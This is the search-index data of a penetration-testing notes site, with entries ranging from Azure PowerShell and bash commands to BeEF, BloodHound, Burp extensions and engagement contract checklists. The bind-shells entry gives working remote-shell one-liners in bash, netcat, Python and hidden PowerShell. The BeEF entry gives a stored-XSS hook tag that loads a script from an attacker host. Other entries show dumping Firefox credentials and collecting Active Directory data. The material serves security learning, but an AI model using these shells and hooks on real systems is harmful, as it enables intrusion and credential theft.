                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#vms","title":"VMs","text":"
                        # List VMs\nGet-AzVm\n\n\n# Create a new VM\nNew-AzVm -ResourceGroupName $rgName -Name \"MyVM01\" -Image \"UbuntuLTS\"\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#storage-accounts","title":"Storage accounts","text":"
                        # List storage accounts\nGet-AzStorageAccount\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#file-disk","title":"File Disk","text":"
                        # List all managed disks\nGet-AzDisk\n\n# Create a new configuration for your disk\n$myDiskConfig = New-AzDiskConfig -Location $location -CreateOption Empty -DiskSizeGB 32 -Sku Standard_LRS\n\n# Create the disk. First assign a variable for the disk name\n$myDiskName = \"myDiskname\"\nNew-AzDisk -ResourceGroupName $rgName -DiskName $myDiskName -Disk $myDiskConfig\n\n# Increase the size of an existing Az disk\nNew-AzDiskUpdateConfig -DiskSizeGB 64 | Update-AzDisk -ResourceGroupName $rgName -DiskName $myDiskName\n\n# Get the current SKU of a given Az disk\n(Get-AzDisk -ResourceGroupName rg-test2 -Name myDiskName).Sku  \n\n# Update a Standard_LRS SKU to a premium one \nNew-AzDiskUpdateConfig -Sku Premium_LRS | Update-AzDisk -ResourceGroupName $rgName -DiskName $myDiskName\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#webapps","title":"WebApps","text":"
                        # List webapps and provide name and location\nGet-AzWebapp | Select-Object Name, Location\n
                        ","tags":["cloud","azure","powershell"]},{"location":"azure-powershell/#_1","title":"Azure Powershell","text":"","tags":["cloud","azure","powershell"]},{"location":"bash/","title":"Bash - Bourne Again Shell","text":"","tags":["bash"]},{"location":"bash/#file-descriptors-and-redirections","title":"File descriptors and redirections","text":"
                        # <<: This is known as a \"here document\" or \"here-strings\" operator. It allows you to input multiple lines of text into a command or a file. Example:\ncat << EOF > stream.txt\n

                        1. cat: It is a command used to display the contents of a file.

                        2. <<: This is known as a \"here document\" or \"here-strings\" operator. It allows you to input multiple lines of text into a command or a file.

                        3. EOF: It stands for \"End of File\" and serves as a delimiter to mark the end of the input. You can choose any other unique string instead of \"EOF\" as long as it is consistent with the opening and closing delimiter.

                        4. >: This is a redirection operator used to redirect the output of a command to a file. In this case, it will create a new file named stream.txt or overwrite its contents if it already exists.

                        5. stream.txt: It is the name of the file where the input text will be written. A complete worked example follows below.
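
                        Putting it all together, a minimal sketch: every line between the two EOF markers is written to stream.txt.

                        cat << EOF > stream.txt\nline one\nline two\nEOF\n\n# Verify the result\ncat stream.txt\n# line one\n# line two\n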

                        ","tags":["bash"]},{"location":"bash/#shortcuts","title":"Shortcuts","text":"

                        CTRL-W: delete the last word. CTRL+→: fill out the next suggested word (the one shown in gray).

                        ","tags":["bash"]},{"location":"bash/#commands","title":"Commands","text":"","tags":["bash"]},{"location":"bash/#df","title":"df","text":"

                        Displays the amount of space available on the file system containing each file name argument.

                        df -H\n# -H: Print sizes in powers of 1000\n# -h: Print sizes in powers of 1024. Humanly readable.\n
                        ","tags":["bash"]},{"location":"bash/#host","title":"host","text":"

                        host is a simple utility for performing DNS lookups. It is normally used to convert names to IP addresses and vice versa. When no arguments or options are given, host prints a short summary of its command-line arguments and options.

                        # General syntax\nhost <name> <server> \n\n# <name> is the domain name that is to be looked up. It can also be a dotted-decimal IPv4 address or a colon-delimited IPv6 address, in which case host by default performs  a  reverse  lookup  for  that  address.   \n# <server>  is  an optional argument which is either the name or IP address of the name server that host should query instead of the server or servers listed in /etc/resolv.conf.\n

                        Example:

                        host example.com 8.8.8.8\n
                        ","tags":["bash"]},{"location":"bash/#lsblk","title":"lsblk","text":"
                        # Lists block devices.\nlsblk\n
                        ","tags":["bash"]},{"location":"bash/#lsusb","title":"lsusb","text":"
                        # Lists USB devices\nlsusb\n
                        ","tags":["bash"]},{"location":"bash/#lsof","title":"lsof","text":"
                        # Lists opened files.\nlsof\n
                        ","tags":["bash"]},{"location":"bash/#lspci","title":"lspci","text":"
                        # Lists PCI devices.\nlspci\n
                        ","tags":["bash"]},{"location":"bash/#lsb_release","title":"lsb_release","text":"

                        Print distribution-specific information

                        # Display version, id, description, release and codename of the distro\nlsb_release -a \n
                        ","tags":["bash"]},{"location":"bash/#netstat","title":"netstat","text":"

                        Print network connections, routing tables, interface statistics, masquerade connections, and multicast memberships. By default, netstat displays a list of open sockets. If you don't specify any address families, then the active sockets of all configured address families will be printed.

                        netstat -tnlp\n# -p: Show  the  PID  and name of the program to which each socket belongs. \n# -l: Show only listening sockets.\n\n# Show networks accessible via VPN\nnetstat -rn\n# -r: Display the kernel routing tables. Replacement for netstat -r is \"ip route\".\n# -n: Show numerical addresses instead of trying to determine symbolic host, port or user names.\n
                        ","tags":["bash"]},{"location":"bash/#sed","title":"sed","text":"

                        sed looks for patterns we have defined in the form of regular expressions (regex) and replaces them with another pattern that we have also defined. Let us stick to the last results and say we want to replace the word \"bin\" with \"HTB.\"

                        The \"s\" flag at the beginning stands for the substitute command. Then we specify the pattern we want to replace. After the slash (/), we enter the pattern we want to use as a replacement in the third position. Finally, we use the \"g\" flag, which stands for replacing all matches.

                        cat /etc/passwd | grep -v \"false\\|nologin\" | tr \":\" \" \" | awk '{print $1, $NF}' | sed 's/bin/HTB/g'\n
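
                        To see the substitution in isolation, a minimal example: every occurrence of bin is replaced with HTB.

                        echo \"/bin/bash /sbin/nologin\" | sed 's/bin/HTB/g'\n# Output: /HTB/bash /sHTB/nologin\n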
                        ","tags":["bash"]},{"location":"bash/#ss","title":"ss","text":"

                        Socket statistics. It can be used to check which ports are listening locally on a given machine.

                        ss -ltn\n#-l: Display only listening sockets.\n#-t: Display TCP sockets.\n#-n: Do not try to resolve service name.\n

                        How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only):

                        ss -l -4 | grep -v \"127\\.0\\.0\" | grep \"LISTEN\" | wc -l\n#   **-l**: show only listening services\n#   **-4**: show only ipv4\n#   **-grep -v \"127.0.0\"**: exclude all localhost results\n#   **-grep \"LISTEN\"**: better filtering only listening services\n#   **wc -l**: count results\n
                        ","tags":["bash"]},{"location":"bash/#uname","title":"uname","text":"

                        # Print out the kernel release to search for potential kernel exploits quickly.\nuname -r\n\n## Flags\n# -a, --all: print all information, in the following order, except omit -p and -i if unknown\n# -s, --kernel-name: print the kernel name\n# -n, --nodename: print the network node hostname\n# -r, --kernel-release: print the kernel release\n# -v, --kernel-version: print the kernel version\n# -m, --machine: print the machine hardware name\n# -p, --processor: print the processor type (non-portable)\n# -i, --hardware-platform: print the hardware platform (non-portable)\n# -o, --operating-system: print the operating system\n

                        ","tags":["bash"]},{"location":"beef/","title":"BeEF - The browser exploitation framework project","text":"

                        BeEF\u00a0is short for\u00a0The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#installation","title":"Installation","text":"

                        Repository: https://github.com/beefproject/beef

                        git clone https://github.com/beefproject/beef\n
                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#usage","title":"Usage","text":"

                        Basically, it allows you to plant a hook via a persistent (stored) script injection. BeEF provides a panel that shows the browsers connected to your hook. If an admin eventually visits the injected page, you may gain access to the server.
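
                        By default, BeEF serves its hook script on port 3000 as hook.js, so a stored script injection typically boils down to planting a single tag pointing at it (the attacker IP below is a placeholder):

                        <script src=\"http://<attacker-ip>:3000/hook.js\"></script>\n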

                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#basic-commands","title":"Basic commands","text":"
                        Social engineering\nOpen webcams\nAlert messages\nRun JavaScript\nGet screenshots of what the person has on their screen\nRedirect the browser\nCreate fake authentication dialog boxes (Facebook...)\n...\n
                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#attacks","title":"Attacks","text":"","tags":["web pentesting","phishing","tools"]},{"location":"beef/#tunneling-proxy","title":"Tunneling proxy","text":"

                        See XSS attacks.

                        An alternative to stealing protected cookies is to use the victim's browser as a proxy. The Tunneling Proxy in BeEF exploits the XSS flaw and uses the victim's browser to perform requests as the victim user to the web application. Basically, it tunnels requests through the hooked browser. By doing so, there is no way for the web application to distinguish between requests coming from the legitimate user and requests forged by an attacker. BeEF also lets you bypass other web-developer protection techniques, such as multiple validations (User-Agent, custom headers, ...).

                        ","tags":["web pentesting","phishing","tools"]},{"location":"beef/#event-logger","title":"Event logger","text":"

                        The event logger allows us to capture keystrokes, acting as a keylogger.

                        ","tags":["web pentesting","phishing","tools"]},{"location":"bind-shells/","title":"Bind shells","text":"All about shells Shell Type Description Reverse shell Initiates a connection back to a \"listener\" on our attack box. Bind shell \"Binds\" to a specific port on the target host and waits for a connection from our attack box. Web shell Runs operating system commands via the web browser, typically not interactive or semi-interactive. It can also be used to run single commands (i.e., leveraging a file upload vulnerability and uploading a\u00a0PHP\u00a0script to run a single command.

                        In a bind shell, the attacking machine initiates a connection to a listener port on the victim's machine.

                        The first step in this attack is starting the listener on port '1234' on the remote host (the victim's), bound to IP '0.0.0.0' so that we can connect to it from anywhere.

                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#bind-shell-connections","title":"Bind shell connections","text":"","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#bash","title":"bash","text":"
                        rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f\n
                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#netcat","title":"netcat","text":"
                        nc -lvp 1234 -e /bin/bash\n
                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#python","title":"python","text":"
                        python -c 'exec(\"\"\"import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind((\"0.0.0.0\",1234));s1.listen(1);c,a=s1.accept();\\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())\"\"\")'\n
                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#powershell","title":"powershell","text":"
                        powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"PS \" + (pwd).Path + \" \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();\n

                        Second step: if we succeeded in the previous step, we have a shell waiting for us on the specified port (1234) on the victim's machine. Now, let's connect to it from our attacking machine:

                        nc 10.10.10.1 1234\n# 10.10.10.1 would be the victim's machine\n# 1234 would be the listening port on the victim's machine\n

                        Unlike a Reverse Shell, if we drop our connection to a bind shell for any reason, we can connect back to it and get another connection immediately. However, if the bind shell command is stopped for any reason, or if the remote host is rebooted, we would still lose our access to the remote host and will have to exploit it again to gain access.
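
                        A sketch of that behavior: wrapping the listener in a loop makes the bind shell accept a new connection each time one drops, though it still will not survive a reboot.

                        # On the victim: restart the listener whenever the connection drops\nwhile true; do nc -lvp 1234 -e /bin/bash; done\n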

                        ","tags":["pentesting","web pentesting","bind shells"]},{"location":"bind-shells/#some-more-resources","title":"Some more resources","text":"Reverse shell Link to resource PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet.md)","tags":["pentesting","web pentesting","bind shells"]},{"location":"bloodhound/","title":"BloodHound","text":"

                        (C# and PowerShell Collectors)

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"bloodhound/#installation","title":"Installation","text":"

                        BloodHound is a single page Javascript web application, built on top of\u00a0Linkurious, compiled with\u00a0Electron, with a\u00a0Neo4j\u00a0database fed by a C# data collector.

                        Download github repo from: https://github.com/BloodHoundAD/BloodHound.

                        Sharphound is the official data collector for BloodHound.

                        sudo apt-get install bloodhound\n

                        Initialize the console:

                        sudo neo4j console \n

                        Open the browser at the indicated address: http://localhost:7474/

                        The first time it will ask you for default user and password: neo4j:neo4j.

                        After logging into the application, you will be prompted to change the default password.

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"bloodhound/#basic-usage","title":"Basic usage","text":"

                        1. Get the SharpHound collector working on the victim's machine:

                        # Same as with powerview\npowershell -ep bypass\n\n# Load SharpHound into the session (dot-source the collector)\n. ..\\Downloads\\SharpHound.ps1\n\n# Generate a zip file\nInvoke-BloodHound -CollectionMethod All -Domain CONTROLER.local -ZipFileName loot.zip\n

                        2. Transfer the loot.zip file to your attacker machine.

                        3. Import loot.zip into BloodHound.

                        # Launch Bloodhound interface.\nbloodhound\n# enter user:password already set before for the neo4j console.\n

                        Click on \"Upload data\". Upload the file.

                        ","tags":["active directory","ldap","windows","enumeration","reconnaissance","tools"]},{"location":"braa/","title":"braa - SNMP scanner","text":"","tags":["enumeration","snmp","port 161","tools"]},{"location":"braa/#installation","title":"Installation","text":"

                        Download from the github repo: https://github.com/mteg/braa

                        Also:

                        sudo apt install braa\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"braa/#basic-usage","title":"Basic usage","text":"
                        braa <community string>@$ip:.1.3.6.*   \n\n    # Example:\n    # braa public@10.129.14.128:.1.3.6.*\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"browsers-pentesting/","title":"Pentesting Browsers","text":"","tags":["pentesting","browsers","chrome","firefox","tools"]},{"location":"browsers-pentesting/#dumping-memory-and-cache","title":"Dumping memory and cache","text":"

                        Tools: mimipenguin, LaZagne.

                        Firefox stored credentials:

                        ls -l .mozilla/firefox/ | grep default \n\ncat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .\n

                        The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.
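
                        A usage sketch, assuming the repository is cloned locally and pointed at the profile directory found above:

                        git clone https://github.com/unode/firefox_decrypt\npython3 firefox_decrypt/firefox_decrypt.py .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/\n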

                        ","tags":["pentesting","browsers","chrome","firefox","tools"]},{"location":"burpsuite/","title":"Burpsuite","text":"

                        Burp Suite is a Man-in-the-middle (MITM) proxy loaded with valuable tools to help pentesters.

                        Related issues:

                        Setting up Postman with BurpSuite

                        Burp Suite has two editions:

                        • Community Edition - Provides you with everything you need to get started and is designed for students or professionals looking to learn more about AppSec. Features include: \u25a0 HTTP(s) Proxy. \u25a0 Modules - Repeater, Decoder, Sequencer & Comparer. \u25a0 Lite version of the Intruder module (Performance Throttling).
                        • Professional Edition - Faster, more reliable offering designed for penetration testers and security professionals. Features include everything in the community edition plus: \u25a0 Project files. \u25a0 No performance throttling. \u25a0 Intruder - Fully featured module. \u25a0 Custom PortSwigger payloads. \u25a0 Automatic scanner and crawler.

                        Accessing older releases: https://portswigger.net/burp/releases/archive.

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#runtime-environments","title":"Runtime environments","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jython-python-environment","title":"Jython: python environment","text":"

                        Download from: https://www.jython.org/download.html

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jruby-ruby-environment","title":"JRuby: ruby environment","text":"

                        Download from: https://www.jruby.org/download

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#extensions-that-make-your-life-better","title":"Extensions that make your life better","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#autorize","title":"Autorize","text":"

                        Autorize is an extension aimed at helping the penetration tester to detect authorization vulnerabilities, one of the more time-consuming tasks in a web application penetration test.

                        It is sufficient to give the extension the cookies of a low-privileged user and navigate the website as a high-privileged user. The extension automatically repeats every request with the session of the low-privileged user and detects authorization vulnerabilities.

                        It is also possible to repeat every request without any cookies in order to detect authentication vulnerabilities in addition to authorization ones.

                        The plugin works without any configuration, but is also highly customizable, allowing configuration of the granularity of the authorization enforcement conditions and also which requests the plugin must test and which not. It is possible to save the state of the plugin and to export a report of the authorization tests in HTML or in CSV.

                        The reported enforcement statuses are the following:

                        1. Bypassed! - Red color
                        2. Enforced! - Green color
                        3. Is enforced??? (please configure enforcement detector) - Yellow color
                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#param-miner","title":"Param Miner","text":"

                        In Burp Suite, you can use the Param Miner extension's \"Guess headers\" function to automatically probe for supported headers using its extensive built-in wordlist.

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#turbo-intruder","title":"Turbo intruder","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#cms-scanner","title":"CMS Scanner","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#waf-detect","title":"WAF Detect","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#bypass-waf","title":"Bypass WAF","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#waf-cookie-fetcher","title":"Waf Cookie Fetcher","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#pdf-viewer","title":"PDF Viewer","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#wayback-machine","title":"Wayback machine","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#software-vulnerability-scanner","title":"Software Vulnerability Scanner","text":"","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#php-object-injection-slinger","title":"PHP Object Injection Slinger","text":"

                        https://github.com/portswigger/poi-slinger

                        This is an extension for Burp Suite Professional, designed to help you scan for PHP Object Injection vulnerabilities on popular PHP Frameworks and some of their dependencies. It will send a serialized PHP Object to the web application designed to force the web server to perform a DNS lookup to a Burp Collaborator Callback Host.

                        The payloads for this extension are all from the excellent Ambionics project PHPGGC. PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically. You will need it for further exploiting any vulnerabilities found by this extension.

                        You should combine your testing with the PHP Object Injection Check extension from Securify so you can identify other possible PHP Object Injection issues that this extension does not pick up.

                        To use the extension, on the Proxy/Target/Intruder/Repeater Tab, right click on the desired HTTP Request and click Send To POI Slinger. This will also highlight the HTTP Request and set the comment Sent to POI Slinger You can watch the debug messages on the extension's output pane under Extender->Extensions->PHP Object Injection Slinger.

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#jwt-editor","title":"JWT Editor","text":"

                        https://github.com/portswigger/jwt-editor

                        JWT Editor is a Burp Suite extension for editing, signing, verifying, encrypting and decrypting JSON Web Tokens (JWTs).

                        It provides automatic detection and in-line editing of JWTs within HTTP requests/responses and web socket messages, signing and encrypting of tokens and automation of several well-known attacks against JWT implementations.

                        It was written originally by Fraser Winterborn, formerly of BlackBerry Security Research Group. The original source code can be found here.

                        For further information, check out the repository here.

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"burpsuite/#java-deserialization-scanner","title":"Java Deserialization Scanner","text":"

                        https://github.com/portswigger/java-deserialization-scanner

                        This extension gives Burp Suite the ability to find Java deserialization vulnerabilities.

                        It adds checks to both the active and passive scanner and can also be used in an \"Intruder like\" manual mode, with a dedicated tab.

                        The extension allows the user to discover and exploit Java Deserialization Vulnerabilities with different encodings (Raw, Base64, Ascii Hex, GZIP, Base64 GZIP) when the following libraries are loaded in the target JVM:

                        • Apache Commons Collections 3 (up to 3.2.1), with five different chains
                        • Apache Commons Collections 4 (up to 4.4.0), with two different chains
                        • Spring (up to 4.2.2)
                        • Java 6 and Java 7 (up to Jdk7u21) without any weak library
                        • Hibernate 5
                        • JSON
                        • Rome
                        • Java 8 (up to Jdk8u20) without any weak library
                        • Apache Commons BeanUtils
                        • Javassist/Weld
                        • JBoss Interceptors
                        • Mozilla Rhino (two different chains)
                        • Vaadin

                        Furthermore, the URLDNS payload has been introduced to actively detect Java deserialization on the backend without any vulnerable library. This check does the same job as the CPU attack vector already present in the \"Manual testing\" section but can be safely added to the Burp Suite Active Scanner engine, while the CPU payload should be used with caution.

                        Once a Java deserialization vulnerability has been found, a dedicated exploitation tab offers a comfortable interface for exploiting it using frohoff's ysoserial: https://github.com/frohoff/ysoserial

                        Mini walkthrough: https://techblog.mediaservice.net/2017/05/reliable-discovery-and-exploitation-of-java-deserialization-vulnerabilities/

                        ","tags":["web pentesting","proxy","burpsuite","tools"]},{"location":"cewl/","title":"cewl - A custom dictionary generator","text":"","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#installation","title":"Installation","text":"

                        Preinstalled in Kali Linux.

                        Github repo: https://github.com/digininja/CeWL.

                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#basic-commands","title":"Basic commands","text":"
                        cewl -m 6 -d 3 --lowercase  URL\n# -d <x>,--depth <x>: Depth to spider to, default 2.\n# -m, --min_word_length: Minimum word length, default 3.\n# --lowercase: save as lowercase\n
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cewl/#examples-from-real-life","title":"Examples from real life","text":"
                        cewl domain/path-to-post -w outputfile.txt\n# -w output a list of words to a file.\n
                        ","tags":["web pentesting","enumeration","dictionaries","tools"]},{"location":"cff-explorer/","title":"CFF explorer","text":"

                        Created by Erik Pistelli, this is a freeware suite of tools including a PE editor called CFF Explorer and a process viewer. The PE editor has full support for PE32/64: special-field description and modification (.NET supported), utilities, rebuilder, hex editor, import adder, signature scanner, signature manager, extension support, scripting, disassembler, dependency walker, etc. It was the first PE editor with support for .NET internal structures, and its resource editor (Windows Vista icons supported) is capable of handling .NET manifest resources. The suite is available for x86 and x64.

                        ","tags":["windows","thick applications"]},{"location":"cff-explorer/#installation","title":"Installation","text":"

                        Download from Explorer Suite \u2013 NTCore.

                        ","tags":["windows","thick applications"]},{"location":"checksum/","title":"Checksum","text":"","tags":["file integrity","checksum"]},{"location":"checksum/#description","title":"Description","text":"

                        A checksum is a small-sized datum from a block of digital data for the purpose of detecting errors which may have been introduced during its transmission or storage.

                        Each checksum is generated by a checksum algorithm. Basically, it takes a file as input and outputs the checksum value of that file. There are various algorithms for generating checksums. Here is the name of some of them and the tool employed to generate them:

                        Algorithm Tool MD5 md5sum SHA-1 sha1sum SHA-256 sha256sum","tags":["file integrity","checksum"]},{"location":"checksum/#how-to-use-checksum-to-verify-file-integrity","title":"How to use checksum to verify file integrity","text":"

                        Go to the directory where the file is stored. Let's suppose we are using MD5 to checksum the file.

                        md5sum fileName\n

                        As a result, it prints out the MD5 (128-bit) checksum of the file. Usually, when downloading a file you are given a checksum to compare with the one you generate from the file itself. If there is a difference, no matter how small, we can assume the downloaded file has been altered.
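
                        A sketch of the comparison step: md5sum -c reads hash/file pairs (hash, two spaces, filename) and reports OK on a match. The hash below is a placeholder for the published checksum.

                        echo \"<expected-checksum>  fileName\" | md5sum -c -\n# fileName: OK\n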

                        ","tags":["file integrity","checksum"]},{"location":"cloning-a-site/","title":"Tools for cloning a site","text":"

                        BeEF.

                        Veil

                        URLCrazy: URLCrazy is an OSINT tool to generate and test domain typos or variations to detect or perform typo squatting, URL hijacking, phishing, and corporate espionage.

                        ","tags":["web pentesting","phishing","tools"]},{"location":"computer-forensic-fundamentals/","title":"Computer Forensic Fundamentals","text":"","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#mbr","title":"MBR","text":"

                        The Master Boot Record (MBR) is\u00a0the information in the first sector of a hard disk or a removable drive. It identifies how and where the system's operating system (OS) is located in order to be booted (loaded) into the computer's main storage or random access memory (RAM).

                        ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#file-systems","title":"File systems","text":"

                        | Windows / floppy disks / USB sticks | FAT12, FAT16/32, NTFS | | Linux (most common) | ext | | Apple/Mac | HFS | | CDs (most common) | ISO 9660, ISO 13490 | | DVDs (most common) | UDF, Joliet |

                        ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#usb-sticks","title":"USB sticks","text":"

                        Get the serial number and manufacturer information (useful in linking to an OS later).

                        First time USB device connected to system (registry key):

                        HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\n

                        Last time USB device connected to system (registry key):

                        HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\DeviceClass\n
                        ","tags":["forensic"]},{"location":"computer-forensic-fundamentals/#ftk-imager-a-tool-for-forensic-analysis","title":"FTK imager - A tool for forensic analysis","text":"

                        What is it? A tool that quickly assesses electronic evidence by obtaining forensic images of computer data without making changes to the original evidence.

                        ","tags":["forensic"]},{"location":"configuration-files/","title":"Configuration files for some juicy services","text":"","tags":["pentesting","privilege escalation","linux"]},{"location":"configuration-files/#exposed-credentials","title":"Exposed Credentials","text":"

                        Look for files with read permission and see if they contain any exposed credentials. This is very common with configuration files, log files, and user history files (bash_history in Linux and PSReadLine in Windows).

                        /var/www/html/config.php\n
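
                        A quick (and noisy) sweep for credential-looking strings in readable locations, plus the history files mentioned above; the paths are typical examples, not an exhaustive list:

                        # Search readable config/log files for credential-like strings\ngrep -rniE \"passw|secret|token\" /var/www /etc 2>/dev/null | head\n\n# Shell history is often worth a look too\ncat ~/.bash_history 2>/dev/null\n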
                        ","tags":["pentesting","privilege escalation","linux"]},{"location":"contract-checklist/","title":"Contract - Checklist","text":"Checkpoint Description \u2610 NDA Non-Disclosure Agreement (NDA) refers to a secrecy contract between the client and the contractor regarding all written or verbal information concerning an order/project. The contractor agrees to treat all confidential information brought to its attention as strictly confidential, even after the order/project is completed. Furthermore, any exceptions to confidentiality, the transferability of rights and obligations, and contractual penalties shall be stipulated in the agreement. The NDA should be signed before the kick-off meeting or at the latest during the meeting before any information is discussed in detail. \u2610 Goals Goals are milestones that must be achieved during the order/project. In this process, goal setting is started with the significant goals and continued with fine-grained and small ones. \u2610 Scope The individual components to be tested are discussed and defined. These may include domains, IP ranges, individual hosts, specific accounts, security systems, etc. Our customers may expect us to find out one or the other point by ourselves. However, the legal basis for testing the individual components has the highest priority here. \u2610 Penetration Testing Type When choosing the type of penetration test, we present the individual options and explain the advantages and disadvantages. Since we already know the goals and scope of our customers, we can and should also make a recommendation on what we advise and justify our recommendation accordingly. Which type is used in the end is the client's decision. \u2610 Methodologies Examples: OSSTMM, OWASP, automated and manual unauthenticated analysis of the internal and external network components, vulnerability assessments of network components and web applications, vulnerability threat vectorization, verification and exploitation, and exploit development to facilitate evasion techniques. \u2610 Penetration Testing Locations External: Remote (via secure VPN) and/or Internal: Internal or Remote (via secure VPN) \u2610 Time Estimation For the time estimation, we need the start and the end date for the penetration test. This gives us a precise time window to perform the test and helps us plan our procedure. It is also vital to explicitly ask how time windows the individual attacks (Exploitation / Post-Exploitation / Lateral Movement) are to be carried out. These can be carried out during or outside regular working hours. When testing outside regular working hours, the focus is more on the security solutions and systems that should withstand our attacks. \u2610 Third Parties For the third parties, it must be determined via which third-party providers our customer obtains services. These can be cloud providers, ISPs, and other hosting providers. Our client must obtain written consent from these providers describing that they agree and are aware that certain parts of their service will be subject to a simulated hacking attack. It is also highly advisable to require the contractor to forward the third-party permission sent to us so that we have actual confirmation that this permission has indeed been obtained. \u2610 Evasive Testing Evasive testing is the test of evading and passing security traffic and security systems in the customer's infrastructure. 
We look for techniques that allow us to find out information about the internal components and attack them. It depends on whether our contractor wants us to use such techniques or not. \u2610 Risks We must also inform our client about the risks involved in the tests and the possible consequences. Based on the risks and their potential severity, we can then set the limitations together and take certain precautions. \u2610 Scope Limitations & Restrictions It is also essential to determine which servers, workstations, or other network components are essential for the client's proper functioning and its customers. We will have to avoid these and must not influence them any further, as this could lead to critical technical errors that could also affect our client's customers in production. \u2610 Information Handling HIPAA, PCI, HITRUST, FISMA/NIST, etc. \u2610 Contact Information For the contact information, we need to create a list of each person's name, title, job title, e-mail address, phone number, office phone number, and an escalation priority order. \u2610 Lines of Communication It should also be documented which communication channels are used to exchange information between the customer and us. This may involve e-mail correspondence, telephone calls, or personal meetings. \u2610 Reporting Apart from the report's structure, any customer-specific requirements the report should contain are also discussed. In addition, we clarify how the reporting is to take place and whether a presentation of the results is desired. \u2610 Payment Terms Finally, prices and the terms of payment are explained.","tags":["information-gathering","rules","of","engagement","cpts"]},{"location":"contractor-agreement-checklist/","title":"Contractors Agreement - Checklist for Physical Assessments","text":"Checkpoint Contents \u2610 Introduction Description of this document. \u2610 Contractor Company name, contractor full name, job title. \u2610 Penetration Testers Company name, pentesters full name. \u2610 Contact Information Mailing addresses, e-mail addresses, and phone numbers of all client parties and penetration testers. \u2610 Purpose Description of the purpose for the conducted penetration test. \u2610 Goals Description of the goals that should be achieved with the penetration test. \u2610 Scope All IPs, domain names, URLs, or CIDR ranges. \u2610 Lines of Communication Online conferences or phone calls or face-to-face meetings, or via e-mail. \u2610 Time Estimation Start and end dates. \u2610 Time of the Day to Test Times of the day to test. \u2610 Penetration Testing Type External/Internal Penetration Test/Vulnerability Assessments/Social Engineering. \u2610 Penetration Testing Locations Description of how the connection to the client network is established. \u2610 Methodologies OSSTMM, PTES, OWASP, and others. \u2610 Objectives / Flags Users, specific files, specific information, and others. \u2610 Evidence Handling Encryption, secure protocols \u2610 System Backups Configuration files, databases, and others. 
